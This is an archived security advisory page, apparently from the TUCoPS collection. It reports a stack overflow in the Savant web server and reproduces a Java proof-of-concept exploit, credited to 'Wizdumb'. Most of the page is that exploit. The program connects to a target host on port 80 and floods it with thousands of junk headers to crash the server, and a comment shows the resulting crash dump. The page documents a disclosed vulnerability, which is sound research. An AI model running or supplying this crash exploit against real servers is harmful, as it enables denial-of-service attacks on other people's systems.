TUCoPS :: Web :: Servers :: savant3.htm

Savant Web Server stack overflow

    Savant Webserver


    Savant Webserver


    Andrew Lewis found  following.  He  found a stack  overflow in the
    Savant webserver  the other  day -  lemmee just  paste the code he
    wrote here...

    /* The MDMA Crew's proof-of-concept code for the buffer overflow in Savant
     * Written by Wizdumb <wizdumb@leet.org || www.mdma.za.net/fk>
     * The overflow occurs when the server recieves too many headers in the GET
     * request. The results of the attack look something like...
     * SAVANT caused an invalid page fault
     * in module KERNEL32.DLL at 015f:bff87eb5.
     * Registers:
     * EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010212
     * EBX=0119ff90 SS=0167 ESP=0109ffc4 EBP=010a0030
     * ECX=010a01e4 DS=0167 ESI=8162f198 FS=20f7
     * EDX=bff76859 ES=0167 EDI=010a020c GS=0000
     * Bytes at CS:EIP:
     * 53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
     * Stack dump:
     * Enjoy!
     * Andrew Lewis aka. Wizdumb [03/07/2000]
    import java.io.*;
    import java.net.*;
    class savantstack {
     public static void main(String[] args) throws IOException {
       if (args.length != 1) {
         System.out.println("Syntax: java savantstack [hostname/ip]");
         System.exit(1); }
       Socket soq = null;
       PrintWriter white = null;
       int i = 5000; // This should do fine :-)
       soq = new Socket(args[0], 80);
       white = new PrintWriter(soq.getOutputStream(), true);
       System.out.print("Showing " + args[0] + " the phj33r :P ...");
       white.print("GET /index.html HTTP/1.0");
       for (int x = 0; x < i; x++) white.println("A:A");
       soq.close(); } }


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